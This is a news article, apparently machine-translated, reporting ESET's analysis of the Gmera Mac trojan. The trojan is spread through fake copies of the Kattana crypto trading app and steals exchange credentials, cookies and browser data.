New Mac Trojan empties cryptocurrency wallets

He copies legitimate trading apps like Kattana. Eset analyzes four different malicious trading apps. They install the Gmera malware, which in turn steals data – including credentials for crypto wallets.

Users who are on their Apple-Computers trading cryptocurrencies should protect themselves from new Mac malware. According to Eset, malware is currently in circulation that claims to be a legitimate version of trading apps for cryptocurrencies. Among other things, the software of the provider Kattana is affected.

Malware (Image: Maksim Kabakou / Shutterstock)The researchers do not know exactly how the Trojan versions of these apps land on a Mac. However, they assume that social engineering plays a role. Especially since Kattana has been drawing attention to malicious copies of his software since March. “The most plausible assumption is that operators contact their target people directly and manipulate them socially to install the malicious application,” the researchers said.

So far, four malicious versions of the legitimate Kattana app have been found. They are offered under the names Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to a trading function, they also include the malware installer Gmera, which, according to Trend Micro, was bundled with another Mac trading app called Stockfolio in 2019.

If the malicious app is executed, Gmera establishes an HTTP connection to a command server on the Internet and establishes a remote terminal session to another command server via a preset IP address. These actions are started via a shell script, which also sets up a launch agent that enables the malware to function permanently.

At least in the case of the Licatrade app examined by Eset, the launch agent did not work. With the other three variants – they should basically only differ slightly – the launch agent works as intended.

The researchers also found most of the legitimate functions of the Kattana app in the malicious version. Above all, the registration function, which links a wallet and the actual trading function, is available. This function in turn is used by cybercriminals to access their victims’ purses.

According to Eset, Gmera is also able to collect information about the infected system. The malware also tries to detect a honeypot. If macOS Catalina is installed, the screenshot function of the malware is not activated; Catalina obtains the user’s consent before taking a screenshot, which could reveal the malware.

Only then does the actual data theft begin. In addition to the login data for cryptocurrency exchanges, the hackers also deduct browser data and cookies.

According to Eset, the backers also signed their malware with a valid Apple certificate, which was however revoked in the meantime. “In the case of Cointrazer, there were only 15 minutes between the time the Apple certificate was issued and the signing of the Trojan by the attackers,” added the researchers. “This, and the fact that we didn’t find anything else that was signed with the same key, suggests they got the certificate explicitly for that purpose.”

Online seminar: Network security and network monitoring in the new normal

The Gigamon Visibility Platform is the catalyst for the fast and optimized provision of data traffic for security tools, network performance and application performance monitoring. Find out in this webinar how Gigamon solutions can increase the efficiency of your security architecture and save costs.

Leave a Reply

Your email address will not be published. Required fields are marked *